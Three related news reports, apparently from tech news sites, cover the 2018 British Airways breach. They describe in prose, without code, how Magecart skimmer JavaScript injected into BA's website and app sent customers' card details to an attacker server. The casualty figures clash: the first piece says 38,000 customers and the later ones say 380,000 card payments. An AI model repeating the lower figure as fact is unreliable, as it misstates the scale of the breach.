British Airways site had credit card skimming code injected

22 lines of JavaScript injected into Web, mobile apps raked in customer credit card data.

Article intro image

Enlarge / Thousands of BA customers had their credit card data "skimmed" by malicious JavaScript code inserted into the airline's website. (credit: Alf van Beem)

Last week, British Airways revealed that all the payment information processed through the airline's website and mobile app between August 21 and September 5 had been exposed. As many as 38,000 British Airways customers may have had their contact and financial information stolen in the breach, which evidence suggests was the result of malicious JavaScript code planted within British Airway's website.

According to a report by RiskIQ's Head Researcher Yonathan Klijnsma published Tuesday, RiskIQ detected the use of a script associated with a "threat group" RiskIQ calls Magecart. the same set of actors believed to be behind a recent credit card breach at Ticketmaster UK. While the Ticketmaster UK breach was the result of JavaScript being injected through a third-party service used by the Ticketmaster website, the British Airways breach was actually the result of a compromise of BA's own Web server, according to the RiskIQ analysis.

"This attack is a highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer,” said Klijnsma. "This skimmer is attuned to how British Airways’ payment page is set up, which tells us that the attackers carefully considered how to target this site in particular."

Read 4 remaining paragraphs | Comments

British Airways breach caused by credit card skimming malware, researchers say

A security firm says credit card skimming malware installed by hackers on British Airways’ website a few months ago was to blame for a data breach of over 380,000 credit cards. Payments through the airline’s website and mobile app were stolen over the three week period, but a key clue was that travel information wasn’t […]

A security firm says credit card skimming malware installed by hackers on British Airways’ website a few months ago was to blame for a data breach of over 380,000 credit cards.

Payments through the airline’s website and mobile app were stolen over the three week period, but a key clue was that travel information wasn’t affected.

Yonathan Klijnsma, a threat researcher at RiskIQ, suspected it might be the same group that was behind the Ticketmaster breach, in which hackers targeted a third-party that loaded code on Ticketmaster’s various sites. From there, it could siphon off thousands of transactions.

This time, Klijnsma said the group took an even more “highly targeted approach,” describing a wave of attacks that the “Magecart” collective has used to steal thousands of records from various sites in recent months.

“This British Airways attack was just an extension of this campaign,” he said, prior to the release of his research.

His research, out Tuesday, points to hackers injecting code directly onto the company’s website which the airline used shared on both the website and the mobile app. Using his company’s proprietary web crawling technology, he found that code hosted on the airline’s global site was compromised on August 21 — the reported date of the breach — and malicious code was injected without anyone noticing.

When a customer clicked bought plane tickets, the code would scrape the credit card information the open payment page and forward the data to a fake site run by the hackers from a private server in Romania.

Names, billing address, email address, and all bank card details were collected by the code.

“This attack is a simple but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer which grabbed forms indiscriminately,” said Klijnsma. “This particular skimmer is very much attuned to how British Airway’s payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer.”

That would explain why the financial data was collected but not the travel and passport data. It also explains why the mobile app was affected, Klijnsma said, because an analysis of the mobile app also loaded the same data-scraping script.

“There’s so many ways they could have stolen the payment or [personal] information, they went for this really simple method, but its super effective,” said Klijnsma.

But, he said, “they went from super advanced to simplifying their attacks — and their [returns are] more insane than ever.”

British Airways spokesperson Liza Ravenscroft declined to comment citing an ongoing criminal investigation.

British Airways customer data stolen in data breach

British Airways has confirmed a data breach. The London-based airline, the largest in the UK, did not disclose much about the breach, only that hackers stole customer data from its website, ba.com. In a statement, BA said that the “personal and financial details” of customers who made bookings on BA’s site or app between August […]

British Airways has confirmed a data breach.

The London-based airline, the largest in the UK, did not disclose much about the breach, only that hackers stole customer data from its website, ba.com.

In a statement, BA said that the “personal and financial details” of customers who made bookings on BA’s site or app between August 21 and September 5 were compromised, but travel or passport information was not taken.

A spokesperson told TechCrunch that “around 380,000 card payments” were compromised. BA had more than 45 million passengers last year.

“The breach has been resolved and our website is working normally,” the company said in a statement.

“British Airways is communicating with affected customers and we advise any customers who believe they may have been affected by this incident to contact their banks or credit card providers and follow their recommended advice,” said the statement.

Under the new European GDPR data protections laws, the airline can face fines of up to four percent of its global annual revenue.